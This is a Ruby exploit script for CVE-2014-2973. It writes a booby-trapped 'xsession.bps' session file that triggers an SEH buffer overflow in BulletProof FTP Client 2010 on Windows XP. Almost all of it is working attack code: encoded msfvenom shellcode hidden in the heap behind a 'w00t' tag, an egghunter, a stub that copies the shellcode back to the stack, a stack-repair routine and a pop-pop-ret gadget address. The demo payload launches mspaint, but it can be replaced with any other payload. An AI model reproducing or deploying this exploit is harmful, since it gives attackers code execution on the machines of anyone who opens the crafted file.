#!/usr/bin/env ruby # Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit # Date: Dec 03 2014 # Vulnerability Discovery: Gabor Seljan # Exploit Author: Muhamad Fadzil Ramli # Software Link: http://www.bpftp.com/ # Version: 2010.75.0.76 # Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600] # CVE: CVE-2014-2973 # Notes: bypass buffer size limitation for bigger payload. Allocate 2nd # shellcode in heap and copy back to stack. This exploit use egghunter # to locate 2nd shellcode in heap and copy to stack. Load the exploit file # and click connect to trigger the exploit. # Offset seh = 93 filename = "xsession.bps" buff = "A" * 500 # ./msfvenom -p windows/exec CMD=mspaint -b '\x00\x0a\x0d\x1a' -e x86/shikata_ga_nai -f ruby heap_sc = "w00tw00t" + "\xda\xc4\xbf\xd7\xec\x92\xb5\xd9\x74\x24\xf4\x5d\x33\xc9" + "\xb1\x32\x83\xed\xfc\x31\x7d\x16\x03\x7d\x16\xe2\x22\x10" + "\x7a\x3c\xcc\xe9\x7b\x5f\x45\x0c\x4a\x4d\x31\x44\xff\x41" + "\x32\x08\x0c\x29\x16\xb9\x87\x5f\xbe\xce\x20\xd5\x98\xe1" + "\xb1\xdb\x24\xad\x72\x7d\xd8\xac\xa6\x5d\xe1\x7e\xbb\x9c" + "\x26\x62\x34\xcc\xff\xe8\xe7\xe1\x74\xac\x3b\x03\x5a\xba" + "\x04\x7b\xdf\x7d\xf0\x31\xde\xad\xa9\x4e\xa8\x55\xc1\x09" + "\x08\x67\x06\x4a\x74\x2e\x23\xb9\x0f\xb1\xe5\xf3\xf0\x83" + "\xc9\x58\xcf\x2b\xc4\xa1\x08\x8b\x37\xd4\x62\xef\xca\xef" + "\xb1\x8d\x10\x65\x27\x35\xd2\xdd\x83\xc7\x37\xbb\x40\xcb" + "\xfc\xcf\x0e\xc8\x03\x03\x25\xf4\x88\xa2\xe9\x7c\xca\x80" + "\x2d\x24\x88\xa9\x74\x80\x7f\xd5\x66\x6c\xdf\x73\xed\x9f" + "\x34\x05\xac\xf5\xcb\x87\xcb\xb3\xcc\x97\xd3\x93\xa4\xa6" + "\x58\x7c\xb2\x36\x8b\x38\x4c\x7d\x91\x69\xc5\xd8\x40\x28" + "\x88\xda\xbf\x6f\xb5\x58\x35\x10\x42\x40\x3c\x15\x0e\xc6" + "\xad\x67\x1f\xa3\xd1\xd4\x20\xe6\xbc\xa9\xae\x68\x57\x20" + "\x3b\x6b" # badchar '\x00\x0a\x0d\x1a\xb1\x83\xb2' # find 1st heap address heap_addr = "\x50" + # push eax "\xbb\xaf\x77\x77\x77" + # mov ebx,777777afh "\x81\xeb\x7f\x77\x77\x77" + # sub ebx,7777777f = 0x30 (TEB) "\x64\x8b\x1b" + # mov ebx,dword ptr fs:[ebx] "\xb9\x0f\x78\x77\x77" + # mov ebx,7777780Fh "\x81\xe9\x7f\x77\x77\x77" + # sub ecx,7777777fh = 0x90 (PEB) "\x8b\x1c\x0b" + # mov ebx,dword ptr [ebx+ecx] "\x8b\x1b" # mov ebx,dword ptr [ebx] egghunter = "\x8b\xd3" + # mov edx,ebx "\xeb\x05" + # jmp $+0x5 (#2) "\x66\x81\xca\xff\x0f" + # or dx, 0xfff (#1) "\x42" + # inc edx (#2) "\x52" + # push edx "\x6a\x02" + # push 2 "\x58" + # pop eax "\xcd\x2e" + # int 0x2e "\x3c\x05" + # cmp al,5 "\x5a" + # pop edx "\x74\xef" + # je $-0xf (#1) "\xb8\x77\x30\x30\x74" + # mov eax,0x74303077 (our tag 'w00t') "\x8b\xfa" + # mov edi,edx "\xaf" + # scasd eax, dword ptr es:[edi] "\x75\xea" + # jne $-0x14 (#2) "\xaf" + # scasd eax, dword ptr es:[edi] "\x75\xe7" + # jne $-0x17 (#2) copy_sc = "\x58" + # pop eax "\x05\x54\xf2\xff\xff" + # add eax,-3500 "\x89\xfe" + # mov esi,edi "\x89\xc7" + # mov edi,eax "\xb9\x61\x78\x77\x77" + # mov ecx,0x77777861 "\x81\xe9\x7f\x77\x77\x77" + # sub ecx,0x7777777f "\xf2\xa4" + # rep movsb "\xff\xe0" # jmp eax stack_sc = heap_addr + egghunter + copy_sc # GetPC buff[1,2] = "\xd9\xeb" # fldpi buff[3,5] = "\x9b\xd9\x74\x24\xf4" # fstenv [esp-0xc] buff[8,1] = "\x58" # pop eax # pop esp into eax # FixRet stub buff[9,7] = "\xc7\x40\x44\x45\x45\x45\x45" # (1) buff[16,7] = "\xc7\x40\x58\x45\x45\x45\x45" # (2) place holder for jmp buff[23,7] = "\xc7\x40\x5c\x45\x45\x45\x45" # (3) place holder for ppr buff[30,stack_sc.size] = stack_sc # repair stack buff[12,4] = buff[seh-24,4] # replace with original sc (1) buff[19,4] = buff[seh-4,4] # replace with original sc (2) buff[26,4] = buff[seh,4] # replace with original sc (3) buff[seh-4,4] = "\xeb\xa6\x41\x41" # jmp $-166 buff[seh,4] = [0x72d11f39].pack('V').force_encoding("utf-8") # ppr : msacm32.drv only non-safeseh without null bps = "\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x42\x75" + "\x6C\x6C\x65\x74\x50\x72\x6F\x6F\x66\x20\x46\x54" + "\x50\x20\x43\x6C\x69\x65\x6E\x74\x20\x53\x65\x73" + "\x73\x69\x6F\x6E\x2D\x46\x69\x6C\x65\x20\x61\x6E" + "\x64\x20\x73\x68\x6F\x75\x6C\x64\x20\x6E\x6F\x74" + "\x20\x62\x65\x20\x6D\x6F\x64\x69\x66\x69\x65\x64" + "\x20\x64\x69\x72\x65\x63\x74\x6C\x79\x2E\x0D\x0A" + buff + "\x0D\x0A\x61\x6E" + "\x6F\x6E\x79\x6D\x6F\x75\x73\x0D\x0A" + heap_sc + "\x62\x70\x69" + "\x63\x70\x6C\x6E\x6B\x69\x69\x62\x6D\x66\x65\x0D" + "\x0A" File.open(filename,"wb") do |fp| fp.write(bps) puts "Exploit file: #{filename} size: #{bps.size}" fp.close end